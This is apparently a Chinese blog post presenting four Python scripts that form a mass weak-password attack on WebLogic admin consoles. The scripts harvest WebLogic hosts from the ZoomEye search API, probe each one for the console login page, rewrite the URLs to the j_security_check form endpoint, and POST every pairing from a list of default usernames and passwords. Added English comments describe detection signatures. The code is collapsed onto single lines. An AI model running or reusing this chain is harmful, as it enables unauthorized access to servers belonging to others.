整理筆記的時候,發現了weblogic的攻擊方法。內心打着算盤看看怎麼寫
個批量的弱口令爆破腳本。得出了如下思路:
1.利用鍾馗之眼採集weblogic的網站,將IP寫入到txt
2.添加後臺路徑,判斷是否能成功鏈接,而且沒有過濾表裏面的錯誤。寫入到txt
3.轉換路徑,將後臺路徑轉換爲表單請求的路徑寫入到txt
4.判斷帳號和密碼是否成功post
詳細思路請參考:https://www.jianshu.com/p/e97b109ace40 (同時也是一份攻擊weblogic服務的好文章)
weblogicpass.py
# weblogicpass.py -- step 1 of the chain: build the candidate host list.
# zoomeye() first truncates save.txt, then logs in to api.zoomeye.org with the
# account placed in `data` and sends the returned access_token as a
# "JWT <token>" Authorization header. It requests pages 0-9 of the host search
# for "app:weblogic" and, for every entry in 'matches', prints and appends the
# tuple ('IP:', ip, 'Port:', port, 'App:', app) to save.txt.
# NOTE(review): the ZoomEye e-mail and password are hard-coded in the source,
# so any copy of this file carries the account's credentials.
# NOTE(review): the login response is indexed without a status check; a failed
# login surfaces as a KeyError on 'access_token' rather than a clear error.
# Defender note: the host list comes from a third-party index, so a listed
# server sees no traffic from this step. The matching defensive check is an
# inventory of your own address space for internet-reachable WebLogic
# listeners; an admin console that is not publicly reachable does not end up
# in a list like this.
import requests def zoomeye(): sjian=open('save.txt','w') sjian.close() data={"username":"鍾馗之眼的登陸郵箱","password":"鍾馗之眼的登陸密碼"} url='https://api.zoomeye.org/user/login' login=requests.post(url=url,json=data) access_token=login.json()['access_token'] logheaders={'Authorization':'JWT'+' '+access_token} for x in range(10): print('[+]page is {}'.format(x)) url2s='https://api.zoomeye.org/host/search?query=app:weblogic&page={}'.format(x) rest2=requests.get(url=url2s,headers=logheaders) vd=rest2.json()['matches'][0:] for q in vd: sj='IP:',q['ip'],'Port:',q['portinfo']['port'],'App:',q['portinfo']['app'] print(sj) print(sj,file=open('save.txt','a')) zoomeye()
weblogicjiexi.py
# weblogicjiexi.py -- step 2 of the chain: probe each harvested IP for the
# console login page.
# jx() truncates save2.txt, reads save.txt line by line and pulls IPv4
# addresses out of each line with a four-group regex. re.findall returns one
# tuple of octets per match, and the chain of replace() calls turns the
# tuple's text form back into a dotted quad. For each address it sends
# GET http://<ip>/console/login/LoginForm.jsp with a fixed Chrome/39
# user-agent and a 1.1 s timeout. A response URL is recorded when the status
# is 200 and `rsc.text not in e` holds for a marker in `error`. The recorded
# URLs are de-duplicated with set() and those matching
# '.*/console/login/LoginForm.jsp' are printed and appended to save2.txt.
# NOTE(review): the bare `except: pass` hides every failure (timeouts, refused
# connections, and programming errors alike).
# Defender note: in access logs this step appears as a single GET for
# /console/login/LoginForm.jsp addressed to the bare IP, carrying exactly the
# user-agent string in `headers`. That path plus that stale Chrome/39 UA is a
# usable signature for log searches and WAF rules. Restricting /console to a
# management network makes this probe fail.
import requests import re def jx(): xj=open('save2.txt','w') xj.close() error=['404','Not Found','不存在','403'] ok=[] headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'} kew = open('save.txt', 'r') for p in kew.readlines(): we = "".join(p.split('\n')) pow = re.findall('(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)',we) for i in pow: pd = '{}'.format(i).replace('(', '').replace(')', '').replace("'", '').replace(',', '.').replace(' ', '') try: rsc=requests.get(url='http://{}/console/login/LoginForm.jsp'.format(pd),headers=headers,timeout=1.1) for e in error: if rsc.status_code==200 and rsc.text not in e: ok.append(rsc.url) except: pass id = list(set(ok)) for p in id: lk=re.findall('.*/console/login/LoginForm.jsp',p) for i in lk: print('[+]ok url:',i+'') print(i+'',file=open('save2.txt','a')) jx()
weblogiczhuanhuan.py
# weblogiczhuanhuan.py -- step 3 of the chain: rewrite the recorded login-page
# URLs into form-submission URLs.
# The script truncates save3.txt and exits with a message if save2.txt does
# not exist. Otherwise it reads save2.txt line by line, strips the newline,
# replaces '/console/login/LoginForm.jsp' with '/console/j_security_check'
# via re.sub, then prints each result and appends it to save3.txt.
# No network traffic is generated here.
# Defender note: /console/j_security_check is the path the next script POSTs
# credentials to, so it is the request path to watch. Rate-limit, alert on
# and restrict by source address any POSTs to it.
import os import re rl=open('save3.txt','w') rl.close() if os.path.exists('save2.txt'): print('[+]ok save2.txt !') else: print('[-]Not found save2.txt') exit() yw=open('save2.txt','r') for e in yw.readlines(): w="".join(e.split('\n')) yd=re.sub('/console/login/LoginForm.jsp','/console/j_security_check',w) print(yd) print(yd,file=open('save3.txt','a'))
weblogicbaopo.py
# weblogicbaopo.py -- step 4 of the chain: submit credential guesses to each
# URL listed in save3.txt.
# main(ip) treats its argument as the full target URL. It walks listd twice in
# nested loops, so every one of the 22 entries is used both as a user name and
# as a password: 484 POSTs per URL, including repeated pairs, because listd
# contains duplicates. Each guess is formatted as a query-style string, split
# back into the `datas` dict (j_username, j_password, j_character_encoding)
# and sent with allow_redirects=False. A guess is reported as successful when
# the response is a 302 whose Location header contains 'console' and does not
# contain 'LoginForm.jsp'; every other response is printed as an error.
# The __main__ block reads save3.txt and calls main() once per line, in
# sequence. `threading` is imported but never used.
# NOTE(review): the bare `except: pass` silently drops every request error.
# NOTE(review): the listd entries look like well-known default or sample
# account names and passwords -- confirm against your own WebLogic baseline.
# Defender note: on the server this appears as a burst of several hundred
# POSTs to /console/j_security_check from one source, all carrying the same
# Chrome/39 user-agent and answered mostly by redirects back to the login
# form. The controls that defeat it are removing default or sample accounts
# and passwords, keeping the security realm's user lockout enabled, and not
# exposing /console outside the management network. An alert on a 302 to a
# non-login console page after a run of failures from the same source catches
# the case where a guess succeeded.
import requests import threading def main(ip): datas={} listd=['weblogic','weblogic','weblogic','welcomel','system','password','admin','security','mary','password','joe','password','wlcsystem','wlcsystem','wlpisystem','wlpisystem','weblogic','admin','weblogic','12345678','admin','12345678'] url='{}'.format(ip) headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'} for user in listd: for passwd in listd: data='j_username={}&j_password={}&j_character_encoding=UTF-8'.format(user,passwd) for j in data.split('&'): key,value=j.split('=',1) datas[key]=value try: request=requests.post(url=url,headers=headers,data=datas,allow_redirects=False) if request.status_code==302 and 'console' in request.headers['Location'] and 'LoginForm.jsp' not in request.headers['Location']: print('[+]url:{}'.format(request.url)) print('[+]username:{}'.format(user)) print('[+]password:{}'.format(passwd)) else: print('[-]url:{}'.format(request.url)) print('[-]Error username:{}'.format(user)) print('[-]Error password:{}'.format(passwd)) except: pass if __name__ == '__main__': we=open('save3.txt','r') for w in we.readlines(): x="".join(w.split('\n')) main(x)
正在爆破某個IP的截圖: